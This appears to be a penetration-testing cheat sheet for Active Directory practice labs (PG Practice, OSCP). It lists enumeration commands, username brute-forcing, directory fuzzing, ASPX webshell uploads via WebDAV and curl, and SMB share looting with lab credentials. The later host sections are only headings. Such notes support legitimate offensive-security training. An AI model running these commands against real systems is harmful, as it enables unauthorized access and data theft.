AD Set

Based on:

  • PG Practice: Access, Hokkaido, Hutch, Nagoya, Resourced, Vault

  • PEN-200: OSCP A, OSCP B, OSCP C

No Creds

Port Scan

The nmap-scan script can be found here.

sudo nmap-scan <target-IP>
Domain Enumeration
# Enumerate objects
ldapsearch -v -x -b "DC=DC01,DC=offsec" -H "ldap://192.168.120.108" "(objectclass=*)"

# Enumerate users' description field
uv run nxc ldap DC01 -u '' -p '' -M get-desc-users
kerbrute userenum -d hokkaido-aerospace.com --dc hokka /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
HTTP(S)
# Dirbust with a directory list
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php,
​
​# Dirbust with a file list
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ
# Connect to WebDAV
cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

# Upload a webshell directly
curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!
# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output

# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/
SMB
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

MS01

Creds

User Context
Host Enumeration
Remote Access βœ…

Check for WinRM, RDP, and SSH access:

SMB
Post-Exploitation (Cached Creds) βœ…
Pivot (Route to the domain) βœ…
AD Attacks (Domain Data) βœ…

MS02

User Context
Host Enumeration
SMB
MSSQL
AD Attacks
Post-Exploitation (Cached Creds)

Last updated

Was this helpful?